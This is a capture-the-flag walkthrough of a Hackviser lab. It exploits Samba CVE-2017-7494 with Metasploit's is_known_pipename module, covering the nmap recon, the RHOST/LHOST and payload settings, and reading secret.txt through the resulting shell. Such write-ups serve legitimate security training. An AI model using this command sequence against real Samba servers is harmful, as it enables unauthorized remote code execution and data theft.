Exploiting Samba RCE (CVE-2017–7494) | Hackviser Labs Walkthrough

Samba is one of the most commonly used services in Linux environments for file and printer sharing. Because of how widely it is deployed, vulnerabilities in Samba can become extremely dangerous when exposed internally or externally.

In this Hackviser lab, the target was vulnerable to CVE-2017–7494, a remote code execution vulnerability affecting Samba versions between 3.5.0 and 4.6.4. The objective was simple: gain access to the target machine and retrieve the contents of /secret.txt.

This walkthrough follows the exact investigation process I used while solving the lab, including the observations, payload choices, and why certain steps were taken during exploitation.

Initial Recon

As usual, I started with a full Nmap scan against the target.

nmap -p- -A -sV 172.20.19.172

nmap -p- -A -sV 172.20.19.172

Why these flags?

• -p- → scan all 65535 ports
• -A → enable OS detection, scripts, and traceroute
• -sV → detect service versions

The scan returned:

At this point, port 445 immediately stood out.

That immediately stood out because the lab description itself mentioned a vulnerable Samba range that includes version 4.6.3.

So instead of spending time enumerating SSH or looking for weak credentials, I shifted directly toward Samba exploitation.

Searching for a Samba Exploit in Metasploit

Since this vulnerability is well-known and already has public exploit modules available, I decided to use Metasploit first before attempting any manual exploitation.

I launched Metasploit:

msfconsole

msfconsole

Then searched for Samba-related exploits:

search type:exploit samba

search type:exploit samba

This returned several Samba modules.

After checking the results, the module matching this vulnerability was:

exploit/linux/samba/is_known_pipename

exploit/linux/samba/is_known_pipename

This module specifically targets the vulnerable Samba pipe handling issue related to CVE-2017–7494.

The module name looks a little unusual at first, but this exploit abuses how vulnerable Samba versions handle named pipes and shared libraries, eventually leading to remote code execution.

Selecting the Exploit Module

I loaded the exploit using:

use exploit/linux/samba/is_known_pipename

use exploit/linux/samba/is_known_pipename

Before blindly setting values, I checked the required configuration options.

show options

show options

This is an important habit during exploitation because every Metasploit module expects slightly different parameters.

The main options required here were:

• RHOST
• LHOST
• payload

Configuring the Exploit

What is RHOST?

RHOST means Remote Host.

This is simply the target machine we want to attack.

set RHOST 172.20.19.172

set RHOST 172.20.19.172

What is LHOST?

LHOST means **Local Host(**my own attacking machine IP).

This tells the payload where to connect back after successful exploitation. In reverse shell scenarios, the victim machine needs to know where the attacker is listening.

set LHOST 172.20.19.53

set LHOST 172.20.19.53

Checking Payloads

I checked available payloads using:

show payloads

show payloads

Interestingly, this module only exposed one payload option:

payload/cmd/unix/interact

payload/cmd/unix/interact

So I kept the default payload and configured it explicitly anyway:

set payload payload/cmd/unix/interact

set payload payload/cmd/unix/interact

Why this payload?

This payload gives an interactive Unix command shell directly after exploitation. Since the goal of the lab was simply to retrieve a file from the system, a lightweight command shell was more than enough.

No need for Meterpreter or anything more advanced here.

Running the Exploit

Once everything was configured, I launched the exploit.

run

run

After a few seconds, Metasploit returned:

That message confirmed the exploit worked successfully and an interactive shell session was opened on the target machine.

At this stage, we essentially had remote command execution on the vulnerable Samba server.

Enumerating the Target

First thing I checked was the current working directory:

pwd

pwd

Output:

/tmp

/tmp

Pretty normal for temporary exploit execution.

I moved one directory back and listed files:

cd ..
ls

cd ..
ls

While checking the directory contents, I noticed:

secret.txt

secret.txt

That was the target file mentioned in the lab objective.

So I simply read its contents using:

cat secret.txt

cat secret.txt

The file contained the required secret value for the challenge.

Final Thoughts

This lab was a straightforward example of how dangerous exposed Samba services can become when vulnerable versions are running internally or externally.

A few things stood out during the process:

• The Nmap version detection saved a lot of time
• Matching the Samba version directly against the CVE description quickly narrowed the attack path
• Using show options and show payloads helped avoid misconfigurations during exploitation
• The default payload was enough because the objective only required command execution and file access

One small thing I noticed while solving the lab was how easy it is to accidentally choose the wrong Metasploit module when multiple Samba exploits appear in search results. Taking a moment to verify the affected version range prevents wasting time debugging failed exploit attempts.